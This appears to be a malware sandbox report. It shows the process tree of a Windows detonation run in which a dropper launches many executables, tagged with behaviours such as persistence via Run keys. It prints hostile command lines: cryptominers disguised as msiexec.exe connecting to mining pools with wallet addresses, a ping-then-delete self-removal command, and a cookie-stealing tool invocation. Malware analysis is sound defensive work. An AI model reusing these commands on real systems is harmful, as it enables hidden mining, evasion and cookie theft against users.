                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\89.259.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=8xkngfwoE7tajrjf3s6dva2vOJcG09Jof6X4Mpbl --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5216
                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                    c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.259.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff606eaac28,0x7ff606eaac38,0x7ff606eaac48
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5176
                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                    "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_5216_NNGAJYZZSJWBAEJC" --sandboxed-process-id=2 --init-done-notifier=692 --sandbox-mojo-pipe-token=13780338260277876815 --mojo-platform-channel-handle=668 --engine=2
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    PID:6912
                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
                                                                                                                                                                                                                    "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_5216_NNGAJYZZSJWBAEJC" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=6970106833962569387 --mojo-platform-channel-handle=912
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4656
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5136 /prefetch:8
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3828 /prefetch:8
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:736
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5932 /prefetch:8
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5092 /prefetch:8
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:6724
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5160 /prefetch:8
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:5780
                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5868 /prefetch:8
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:4396
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:2236
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-O47S4.tmp\Install.tmp
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-O47S4.tmp\Install.tmp" /SL5="$20360,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            PID:4448
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-O3R46.tmp\Ultra.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-O3R46.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              PID:4344
                                                                                                                                                                                                                              • C:\Program Files\Windows Sidebar\GSEFEVQJTY\ultramediaburner.exe
                                                                                                                                                                                                                                "C:\Program Files\Windows Sidebar\GSEFEVQJTY\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:1264
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-P6GLP.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-P6GLP.tmp\ultramediaburner.tmp" /SL5="$7027C,281924,62464,C:\Program Files\Windows Sidebar\GSEFEVQJTY\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  PID:4772
                                                                                                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:4588
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\78-f6918-332-bf788-998b650a5c71b\Molefuxuky.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\78-f6918-332-bf788-998b650a5c71b\Molefuxuky.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                PID:4244
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          PID:4968
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\773F.tmp.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\773F.tmp.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:5148
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\773F.tmp.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\773F.tmp.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                              PID:5652
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7934.tmp.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7934.tmp.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:5196
                                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w15848@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:5364
                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w16853 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                PID:5436
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:5932
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                  PID:6008
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg6_6asg.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg6_6asg.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              PID:5960
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                                                              PID:6008
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:1632
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4496
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-1I9ES.tmp\IrecCH6.tmp
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-1I9ES.tmp\IrecCH6.tmp" /SL5="$503DC,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:2920
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-MA7S3.tmp\player_record_48792.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-MA7S3.tmp\player_record_48792.exe" /S /UID=irecch6
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                    PID:2280
                                                                                                                                                                                                                                    • C:\Program Files\VideoLAN\WIYWFNANSP\irecord.exe
                                                                                                                                                                                                                                      "C:\Program Files\VideoLAN\WIYWFNANSP\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:6232
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-R9GV1.tmp\irecord.tmp
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-R9GV1.tmp\irecord.tmp" /SL5="$40598,6139911,56832,C:\Program Files\VideoLAN\WIYWFNANSP\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                        PID:6248
                                                                                                                                                                                                                                        • C:\Program Files (x86)\recording\i-record.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:6376
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\d5-9f8d1-272-2df9e-77683687b81a4\Lylufyvega.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\d5-9f8d1-272-2df9e-77683687b81a4\Lylufyvega.exe"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                      PID:6264
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\d2-83aee-698-8f2bf-de8247fc6cfdb\Nohyzhitajy.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\d2-83aee-698-8f2bf-de8247fc6cfdb\Nohyzhitajy.exe"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:6288
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                PID:6328
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:6440
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:6832
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5864
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:2624
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:5028
                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                          PID:4560
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:5568
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:5084
                                                                                                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x410
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:6080
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                            PID:4628
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3060
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              PID:5164
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              PID:5676
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              PID:6708
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8C39.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8C39.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:2368
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8EFA.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8EFA.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:2920
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3940
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6052
                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                    PID:2628
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6812
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2088
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:5544
                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5900
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:6632
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:6956
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:1132
                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                          PID:3976
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:5320
